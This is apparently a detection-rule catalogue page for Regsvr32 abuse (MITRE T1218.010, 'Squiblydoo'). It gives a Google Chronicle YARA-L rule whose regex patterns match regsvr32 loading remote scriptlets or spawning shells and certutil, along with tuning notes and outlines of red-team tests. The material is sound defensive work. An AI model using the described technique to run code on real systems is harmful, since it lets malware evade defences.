T1218.010 Google Chronicle · YARA-L

Detect Regsvr32 in Google Chronicle

Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including DLLs, on Windows systems. The 'Squiblydoo' variation passes a URL to a remote COM scriptlet file (SCT) that executes without registry changes, making no persistent artifacts. This technique is widely used by QakBot, Emotet, Dridex, Valak, Astaroth, TA551, and many APTs including APT32, APT29, Kimsuky, Cobalt Group, Leviathan, and Storm-0501. It is one of the most abused LOLBins in the threat landscape.

MITRE ATT&CK

Tactic
Defense Evasion
Technique
T1218 System Binary Proxy Execution
Sub-technique
T1218.010 Regsvr32
Canonical reference
https://attack.mitre.org/techniques/T1218/010/

YARA-L Detection Query

Google Chronicle (YARA-L)
yaral 
rule T1218_010_Regsvr32_Abuse {
  meta:
    author = "Argus Detection Engineering"
    description = "Detects regsvr32.exe abuse including Squiblydoo remote SCT execution, scrobj.dll inline script loading, suspicious Office and script-host parent processes, and dangerous child processes spawned by regsvr32.exe. Covers T1218.010 abuse by QakBot, Emotet, Dridex, Valak, APT32, APT29, Kimsuky, and Cobalt Group."
    mitre_attack_tactic = "Defense Evasion"
    mitre_attack_technique = "T1218.010"
    severity = "HIGH"
    confidence = "HIGH"
    reference = "https://attack.mitre.org/techniques/T1218/010/"

  events:
    $e.metadata.event_type = "PROCESS_LAUNCH" and
    (
      (
        re.regex($e.target.process.file.full_path, `(?i)\\regsvr32\.exe$`) and
        (
          re.regex($e.target.process.command_line, `(?i)https?://`) or
          re.regex($e.target.process.command_line, `(?i)scrobj`) or
          re.regex($e.target.process.command_line, `(?i)\/i:`) or
          re.regex($e.principal.process.file.full_path, `(?i)(winword|excel|outlook|powerpnt|cmd|powershell|wscript|cscript|mshta)\.exe$`)
        )
      ) or
      (
        re.regex($e.principal.process.file.full_path, `(?i)\\regsvr32\.exe$`) and
        re.regex($e.target.process.file.full_path, `(?i)(cmd|powershell|wscript|cscript|rundll32|certutil)\.exe$`)
      )
    )

  condition:
    $e
}
high severity high confidence

Google Chronicle YARA-L 2.0 rule detecting regsvr32.exe abuse via UDM PROCESS_LAUNCH events. Matches Squiblydoo remote SCT (HTTP/S in command line), scrobj.dll COM scriptlet loading, inline /i: script execution, invocation from Office applications and script interpreters as parent processes, and dangerous binaries (cmd, powershell, wscript, cscript, rundll32, certutil) spawned as children of regsvr32.exe. Compatible with Chronicle Forwarder ingesting Sysmon or Defender ATP process telemetry.

Data Sources

Google Chronicle SIEMChronicle Forwarder (Sysmon)Microsoft Defender for Endpoint via Chronicle

Required Tables

UDM Events (PROCESS_LAUNCH entity type)

False Positives & Tuning

  • IT operations runbooks invoking regsvr32.exe from cmd.exe or powershell.exe to register or unregister ActiveX controls and COM automation servers during legitimate configuration management
  • Office add-in and plugin installers that legitimately spawn regsvr32.exe from an Office parent (winword.exe, outlook.exe) to register COM shim DLLs during first-run initialisation
  • Authorised red team or penetration testing engagements using Squiblydoo payloads — correlate alert timestamps against approved change management records before escalating
Download portable Sigma rule (.yml)

Other platforms for T1218.010

Microsoft Sentinel (KQL) Splunk (SPL) Elastic Security (Elastic) IBM QRadar (QRadar) Sumo Logic CSE (Sumo) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1Squiblydoo - Regsvr32 Remote SCT Execution

    Expected signal: Sysmon Event ID 1: regsvr32.exe with /s /n /u /i: URL and scrobj.dll in command line. Sysmon Event ID 3: network connection attempt to 127.0.0.1:8080. Security Event ID 4688. Sysmon Event ID 7: scrobj.dll loaded by regsvr32.exe.

  2. Test 2Regsvr32 DLL Execution from Temp Directory

    Expected signal: Sysmon Event ID 11: DLL written to Temp. Sysmon Event ID 1: regsvr32.exe with /s and Temp path. Sysmon Event ID 7: DLL loaded by regsvr32.exe. Security Event ID 4688.

  3. Test 3Regsvr32 Launched from PowerShell Parent

    Expected signal: Sysmon Event ID 1: powershell.exe then regsvr32.exe with ParentImage=powershell.exe. SuspiciousParent fires. Security Event ID 4688 for both. Regsvr32 will fail (no valid DLL) but the process creation event fires.

Last updated: 2026-04-13 Research depth: deep
References (6)

Unlock Pro Content

Get the full detection package for T1218.010 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Parent Technique

T1218System Binary Proxy Execution

Related Sub-techniques

T1218.001Compiled HTML FileT1218.002Control PanelT1218.003CMSTPT1218.004InstallUtilT1218.005MshtaT1218.007MsiexecT1218.008OdbcconfT1218.009Regsvcs/RegasmT1218.011Rundll32T1218.012VerclsidT1218.013MavinjectT1218.014MMCT1218.015Electron Applications

Related Techniques

T1218System Binary Proxy ExecutionT1546.015Component Object Model HijackingT1566.001Spearphishing AttachmentT1059.007JavaScriptT1059.005Visual BasicT1071.001Web ProtocolsT1218.008Odbcconf

Same Tactic: Defense Evasion

Popular Detections